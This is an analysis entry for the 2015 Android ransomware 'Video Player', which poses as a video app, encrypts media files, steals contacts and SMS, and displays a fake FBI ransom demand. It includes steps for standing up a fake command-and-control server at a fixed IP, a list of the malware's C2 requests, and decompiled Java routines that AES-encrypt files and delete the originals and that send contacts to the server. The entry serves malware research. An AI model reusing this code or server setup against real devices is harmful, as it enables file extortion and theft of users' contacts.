Videoplayer

2015

Summary

Steal, ransom, data encryption and phone locking

GroDDViewer graphs:

Details

Video Player is a ransomware discovered in 2015. It encrypts user’s multimedia files stored, and can send a SMS to the user's contact to ask them to download the malware. The malware can steal user's contact, and user's SMS. The application takes the identity of government (FBI) to ask a ransom.

The application is a fake video reader. The interface is simple. The application can't read a video.

When the application is blocked, the application shows a message which said the user is "guilty to have pornographic file, it is forbidden by the US law, you must pay".

The application needs a server to execute the malicious code. However today the server is down so a fake server has been created to steal contacts.

Stage 1 : Configuration of the fake server

You must configure the phone, activate the tethering (Settings > More > Tethering & portable hotspot > USB tethering )

To configure the server, you need to do:

$ ifconfig (The interface usb0 has the IP1)
# echo 1 > /proc/sys/net/ipv4/ip_forward
adb shell
netcfg
route add default gw IP1 dev rndis0
exit
ip 148.251.154.104/24 add IPserveur dev eth0
python server.py 12449

Stage 2 : Communication between the client and the server

The client sends many requests to the server :

(POST 148.251.154.104:12449/pha) to send informations of the phone
(GET 148.251.154.104:12449/gac) to ask order. The client receives an identifiant of an order.
(GET 148.251.154.104:12449/eaction) is to confirme the order only. The client confirms the requete has been done with the answer status (code 200)

Other resources

Triggering

To trigger the malware, launch the server and start the application

Caracteristics

Malware type :

  • Ransomware

Attacks :

  •   Confidentiality

  •   Integrity

  •   Availability

  •   Normal use

Infection technique : Standalone application

Malicious code type :

  • Use Java code
  • Use native code

Hidding techniques :

  • Not hidden

Triggering techniques :

  • Executed at launch
  • Waits for a particular intent

Samples

Java source code extracts:

crypto.java The function which encrypt the file.
contact.java The function which send the user's contacts.
commande.java This an exemple of order.

crypto.java

  private static final byte[] salt = "ThisIsSalt".getBytes();  

  private static void EncryptFile(String paramString, Key paramKey, int paramInt)
    throws IOException, NoSuchAlgorithmException, NoSuchPaddingException, InvalidKeyException
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString);
    File localFile = new File(paramString + "_Enc");
    if (!localFile.exists()) {
      localFile.createNewFile();
    }
    Object localObject = new FileOutputStream(localFile);
    Cipher localCipher = Cipher.getInstance("AES");
    localCipher.init(1, paramKey);
    paramKey = new CipherOutputStream((OutputStream)localObject, localCipher);
    localObject = new byte[paramInt];
    for (;;)
    {
      int i = localFileInputStream.read((byte[])localObject, 0, paramInt);
      if (i == -1) {
        break;
      }
      paramKey.write((byte[])localObject, 0, i);
    }
    paramKey.close();
    paramString = new File(paramString);
    paramString.delete();
    localFile.renameTo(paramString);
    localFileInputStream.close();
  }

contact.java

  private void getAndSendContactData()
  {
    Object localObject = DataHelper.getContactList(this);
    ArrayList localArrayList = new ArrayList(((List)localObject).size());
    localObject = ((List)localObject).iterator();
    while (((Iterator)localObject).hasNext()) {
      localArrayList.add(new ContactEntry((Contact)((Iterator)localObject).next()));
    }
    localObject = RequestFuture.newFuture();
    this.mRQ.add(new ContactsRequest(localArrayList, (Response.Listener)localObject, (Response.ErrorListener)localObject));
    try
    {
      ((RequestFuture)localObject).get(30L, TimeUnit.SECONDS);
      Log.d("CheckerSrv", "Contacts sending request succeeded");
      return;
    }
    catch (Exception localException)
    {
      Log.e("CheckerSrv", "Contacts sending request failed. " + localException.getLocalizedMessage());
    }
  }

commande.java

public class CommandData
{
  @SerializedName("id")
  int mId;
  
  public ActionType getActionType()
  {
    return ActionType.forCommandId(this.mId);
  }
  
  public int getId()
  {
    return this.mId;
  }
}

Samples